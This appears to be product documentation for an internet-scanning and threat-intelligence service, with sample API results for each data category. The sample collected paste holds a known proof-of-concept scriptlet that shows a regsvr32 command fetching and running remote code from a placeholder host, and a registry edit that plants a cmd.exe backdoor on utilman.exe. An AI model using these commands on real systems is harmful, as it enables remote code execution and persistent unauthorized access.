Each collected information is enriched with a timestamp and geolocation information (where applicable).

inetnum category

IP (v4 and v6) networks description as given by RIRs (Regional Internet Registries), except for the United States which does not disclose that information publicly.

{
  "count": 10,
  "error": 0,
  "max_page": 8,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "inetnum",
      "@timestamp": "2018-10-21T01:35:36.000Z",
      "@type": "doc",
      "country": "US",
      "ipv6": "false",
      "netname": "EU-EDGECASTEU-20080602",
      "seen_date": "2018-10-21",
      "source": "RIPE",
      "subnet": "93.184.208.0/20"
    },
    {
      "@category": "inetnum",
      "@timestamp": "2018-10-21T01:35:36.000Z",
      "@type": "doc",
      "country": "EU",
      "information": [
        "NETBLK-03-EU-93-184-208-0-24"
      ],
      "ipv6": "false",
      "netname": "EDGECAST-NETBLK-03",
      "seen_date": "2018-10-21",
      "source": "RIPE",
      "subnet": "93.184.208.0/24"
    },
[..]
  ],
  "status": "ok",
  "took": "0.733",
  "total": 74
}

synscan category

Open TCP ports found on the Internet. Each open port is also enriched with detected operating system (using our own TCP/IP stack fingerprinting technic). As of today, nearly 50 ports are scanned at least once a month, but other ports may be scanned according to press releases.

{
  "count": 3,
  "error": 0,
  "max_page": 2,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "synscan",
      "@timestamp": "2018-10-20T12:59:57.000Z",
      "@type": "doc",
      "asn": "AS18779",
      "city": "San Jose",
      "country": "US",
      "ip": "107.164.81.7",
      "ipv6": "false",
      "location": "37.3387,-121.8914",
      "organization": "EGIHosting",
      "os": "Linux",
      "port": "80",
      "seen_date": "2018-10-20",
      "subnet": "107.164.0.0/17"
    },
[..]
  ],
  "status": "ok",
  "took": "0.026",
  "total": 3
}

datascan category

Application responses to our application requests. Application requests are performed against found open TCP ports, or directly to some UDP ports. We are using our own technology for protocol identification. In fact, we are able to recognize more than 40 different protocols (as of today). Thanks to our methodology, instead of searching our data on a port-basis, you can simply search by protocol instead.

Furthermore, as well as crawling the clear Net for HTTP protocol, we are also crawling the clear Web by using domain name information when performing HTTP 1.1 requests with a valid HTTP Host header. Thus, we are able to identify multiple virtual hosts on a unique IP address.

{
  "count": 2,
  "error": 0,
  "max_page": 1,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "datascan",
      "@timestamp": "2018-10-26T10:30:15.000Z",
      "@type": "doc",
      "app": {
        "extract": {
          "domain": [
            "w3.org",
            "microsoft.com"
          ],
          "hostname": [
            "go.microsoft.com",
            "www.w3.org"
          ],
          "url": [
            "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd",
            "http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409",
            "http://www.w3.org/1999/xhtml"
          ]
        },
        "http": {
          "bodymd5": "ac3b7fe8b6538dad865f905fa06cf19e",
          "headermd5": "3a194f303abdadec442ba1646de5b2c8",
          "title": "IIS7"
        },
        "length": "934"
      },
      "asn": "AS18779",
      "city": "San Jose",
      "country": "US",
      "cpe": [
        "cpe:/a:microsoft:iis:7.5"
      ],
      "data": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nLast-Modified: Sat, 18 Aug 2018 21:54:32 GMT\r\nAccept-Ranges: bytes\r\nETag: \"f35f1b3e37d41:0\"\r\nServer: Microsoft-IIS/7.5\r\nX-Powered-By: ASP.NET\r\nDate: Fri, 26 Oct 2018 10:29:58 GMT\r\nContent-Length: 689\r\n\r\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\r\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\" />\r\n<title>IIS7</title>\r\n<style type=\"text/css\">\r\n<!--\r\nbody {\r\n\tcolor:#000000;\r\n\tbackground-color:#B3B3B3;\r\n\tmargin:0;\r\n}\r\n\r\n#container {\r\n\tmargin-left:auto;\r\n\tmargin-right:auto;\r\n\ttext-align:center;\r\n\t}\r\n\r\na img {\r\n\tborder:none;\r\n}\r\n\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id=\"container\">\r\n<a href=\"http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409\"><img src=\"welcome.png\" alt=\"IIS7\" width=\"571\" height=\"411\" /></a>\r\n</div>\r\n</body>\r\n</html>",
      "datamd5": "5cad586f64f2e431634331ca755e5039",
      "device": {
        "class": "Web Server"
      },
      "ip": "107.164.96.182",
      "ipv6": "false",
      "location": "37.3387,-121.8914",
      "organization": "EGIHosting",
      "os": "Windows",
      "osvendor": "Microsoft",
      "osversion": [
        "Server 2008",
        "7"
      ],
      "port": "80",
      "product": "IIS",
      "productvendor": "Microsoft",
      "productversion": "7.5",
      "protocol": "http",
      "protocolversion": "1.1",
      "reason": "OK",
      "seen_date": "2018-10-26",
      "source": "datascan",
      "status": "200",
      "subnet": "107.164.0.0/17",
      "tag": [
        "default",
        "ok"
      ],
      "tls": "false"
    },
[..]
  ],
  "status": "ok",
  "took": "0.011",
  "total": 2
}

pastries category

Content of pasties collected in a continuous mode. As of today, only pastebin is collected. Each collected pastie is enriched with DNS information (where applicable). That is, you can search for an IP address in pastries category and you may find pasties linked to it, even though only an URL was contained in the original pastie. Same is true for domain name or many other DNS-related information.

{
  "count": 10,
  "error": 0,
  "max_page": 344,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "pastries",
      "@timestamp": "2018-10-26T09:38:41.000Z",
      "@type": "doc",
      "content": "<?XML version=\"1.0\"?>\r\n<scriptlet>\r\n\r\n<registration\r\n    description=\"Bandit\"\r\n    progid=\"Bandit\"\r\n    version=\"1.00\"\r\n    classid=\"{AAAA1111-0000-0000-0000-0000FEEDACDC}\"\r\n\t>\r\n\t\r\n\t<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll\r\n\t<!-- DFIR -->\r\n\t<!--\t\t.sct files are downloaded and executed from a path like this -->\r\n\t<!-- Though, the name and extension are arbitary.. -->\r\n\t<!-- c:\\users\\USER\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\2vcqsj3k\\file[2].sct -->\r\n\t<!-- Based on current research, no registry keys are written, since call \"uninstall\" -->\r\n\t\r\n\t\r\n\t<!-- Proof Of Concept - Casey Smith @subTee -->\r\n\t<script language=\"JScript\">\r\n\t\t<![CDATA[\r\n\t\r\n\t\t\tvar r = new ActiveXObject(\"WScript.Shell\").Run(\"calc.exe\");\r\n\t\r\n\t\t]]>\r\n\t</script>\r\n</registration>\r\n\r\n<public>\r\n    <method name=\"Exec\"></method>\r\n</public>\r\n<script language=\"JScript\">\r\n<![CDATA[\r\n\t\r\n\tfunction Exec()\r\n\t{\r\n\t\tvar r = new ActiveXObject(\"WScript.Shell\").Run(\"reg add 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe' /t REG_SZ /v Debugger /d 'C:\\Windows\\System32\\cmd.exe' /f\");\r\n\t}\r\n\t\r\n]]>\r\n</script>\r\n\r\n</scriptlet>",
      "domain": [
        "example.com"
      ],
      "file": [
        "utilman.exe",
        "calc.exe",
        "wscript.sh",
        "scrobj.dll",
        "cmd.exe"
      ],
      "ip": [
        "2606:2800:220:1:248:1893:25c8:1946",
        "93.184.216.34"
      ],
      "key": "2WpScvHm",
      "scheme": [
        "http"
      ],
      "seen_date": "2018-10-26",
      "size": "1178",
      "source": "pastebin",
      "syntax": "text",
      "tld": "com",
      "url": [
        "http://example.com/file.sct"
      ]
    },
[..]
  ],
  "status": "ok",
  "took": "0.028",
  "total": 504
}

resolver category

Each time an IP address (v4 or v6) or a host name is found in collected information (whatever the source category), we perform DNS requests (both forward and reverse). This passive DNS information is thus collected and stored in this information category.

{
  "count": 10,
  "error": 0,
  "max_page": 2,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "resolver",
      "@timestamp": "2018-10-22T22:27:36.000Z",
      "@type": "doc",
      "asn": "AS20940",
      "city": "Bielefeld",
      "country": "DE",
      "domain": "go.com",
      "forward": "cdn.abclocal.go.com",
      "host": "cdn",
      "ip": "2.22.52.73",
      "ipv6": "false",
      "location": "52.0106,8.5493",
      "organization": "Akamai International B.V.",
      "seen_date": "2018-10-22",
      "source": "pastries",
      "subdomains": [
        "abclocal.go.com"
      ],
      "subnet": "2.22.52.0/24",
      "tld": "com",
      "type": "forward"
    },

[..]
  ],
  "status": "ok",
  "took": "0.050",
  "total": 18
}

threatlist category

We collect and aggregate a fair number of open threat lists. As of today, 25 lists are aggregated. We also have our own threat lists based on our honeypots. For instance, we have dedicated Mirai and Broadcom UPnP hunter botnet lists.

{
  "count": 3,
  "error": 0,
  "max_page": 1,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "threatlist",
      "@timestamp": "2018-07-24T08:35:41.000Z",
      "@type": "doc",
      "asn": "AS14061",
      "city": "Frankfurt am Main",
      "country": "DE",
      "ipv6": "false",
      "location": "50.1153,8.6823",
      "organization": "DigitalOcean, LLC",
      "seen_date": "2018-07-24",
      "subnet": "206.81.18.195/32",
      "tag": [
        "botnet",
        "mirai"
      ],
      "threatlist": "ONYPHE - botnet/mirai"
    },
[..]
  ],
  "status": "ok",
  "took": "0.015",
  "total": 3
}

geoloc category

Geolocation information for IP addresses (v4 and v6) based on MaxMind Geolite2. Along with collecting and tracking that information, we also perform reverse DNS requests on records and enrich entries with that information.

{
  "count": 10,
  "error": 0,
  "max_page": 1000,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "geoloc",
      "@timestamp": "2019-04-30T10:00:00.000Z",
      "@type": "doc",
      "asn": "AS16276",
      "country": "FR",
      "domain": "ganesha.fr",
      "host": "ladaptfoad",
      "ip": "91.121.229.97",
      "ipv6": "false",
      "location": "48.8582,2.3387",
      "organization": "OVH SAS",
      "reverse": "ladaptfoad.ganesha.fr",
      "seen_date": "2019-04-30",
      "source": "geolite2",
      "subnet": "91.121.229.96/27",
      "tld": "fr"
    },
    {
      "@category": "geoloc",
      "@timestamp": "2019-04-30T10:00:00.000Z",
      "@type": "doc",
      "asn": "AS16276",
      "country": "PT",
      "domain": "ip-91-121-224.eu",
      "host": "ip11",
      "ip": "91.121.224.11",
      "ipv6": "false",
      "location": "38.7139,-9.1394",
      "organization": "OVH SAS",
      "reverse": "ip11.ip-91-121-224.eu",
      "seen_date": "2019-04-30",
      "source": "geolite2",
      "subnet": "91.121.224.10/31",
      "tld": "eu"
    },
[..]
  ],
  "status": "ok",
  "took": "0.067",
  "total": 115769
}

sniffer category

We have a number of distributed honeypots on the Internet. We are listening to Internet background noise and performing passive operating system identification (using our own TCP/IP stack fingerprinting technic).

Furthermore, when a malicious pattern is found, we are performing a synscan along with a datascan to collect more information regarding the source IP address. synscan, datascan, resolver and threatlist information categories are enriched thanks to this information category.

{
  "count": 10,
  "error": 0,
  "max_page": 38,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "sniffer",
      "@timestamp": "2018-10-26T08:55:39.000Z",
      "@type": "doc",
      "asn": "AS45899",
      "city": "Can Tho",
      "country": "VN",
      "data": "k\\xa6\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00 CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\x00\\x00!\\x00\\x01",
      "datamd5": "9e172f3c20c7af5b5776dc0d1177c97c",
      "destport": "137",
      "domain": "vnpt.vn",
      "host": "static",
      "ip": "14.164.46.122",
      "ipv6": "false",
      "location": "10.0333,105.7833",
      "organization": "VNPT Corp",
      "reverse": "static.vnpt.vn",
      "seen_date": "2018-10-26",
      "srcport": "17453",
      "subnet": "14.164.0.0/14",
      "tag": [
        "hasreverse",
        "netbiosns",
        "udpdata"
      ],
      "tld": "vn",
      "transport": "udp",
      "type": "udpdata"
    },

[..]
  ],
  "status": "ok",
  "took": "0.045",
  "total": 374
}

ctl category

We collect some Certificate Transparency Logs (CTLs) X509 cerfificates information. As with some other information categories, we perform DNS requests (IP v4 and v6) to enrich collected data with DNS-related information and also feed our passive DNS (resolver information category).

{
  "count": 10,
  "error": 0,
  "max_page": 96,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "ctl",
      "@timestamp": "2018-10-26T11:45:56.000Z",
      "@type": "doc",
      "basicconstraints": [
        "critical"
      ],
      "ca": "false",
      "domain": "freese-feldhaus.de",
      "extkeyusage": [
        "serverAuth",
        "clientAuth"
      ],
      "fingerprint": {
        "md5": "63dc7530020e76cd599e914b1ede8e8e",
        "sha1": "ba4ef99d26ae0514076e33c3f5f7da40716427b9",
        "sha256": "b2b52ca06085edc1240177aaee0b6704ac9f6ebe178d5774d76de4a969fe8aac"
      },
      "host": "vpn",
      "ip": "80.228.36.150",
      "issuer": {
        "commonname": "COMODO RSA Domain Validation Secure Server CA",
        "country": "GB",
        "organization": "COMODO CA Limited"
      },
      "keyusage": [
        "critical",
        "digitalSignature",
        "keyEncipherment"
      ],
      "publickey": {
        "algorithm": "rsaEncryption",
        "exponent": "65537",
        "length": "2048"
      },
      "seen_date": "2018-10-26",
      "serial": "03:41:31:f7:9c:1c:f7:c0:59:db:b9:09:a2:aa:06:44",
      "signature": {
        "algorithm": "sha256WithRSAEncryption"
      },
      "source": "Cloudflare Nimbus 2020",
      "subject": {
        "altname": [
          "vpn.freese-feldhaus.de",
          "www.vpn.freese-feldhaus.de"
        ],
        "commonname": "www.vpn.freese-feldhaus.de"
      },
      "tld": "de",
      "validity": {
        "notafter": "2020-10-25T23:59:59.000Z",
        "notbefore": "2018-10-26T00:00:00.000Z"
      },
      "version": "v3",
      "wildcard": "false"
    },
[..]
  ],
  "status": "ok",
  "took": "0.017",
  "total": 952
}

Other information categories

But we collect more information categories as described in this post. You will have to subscribe to one of our Entreprise Plan to be able to access them.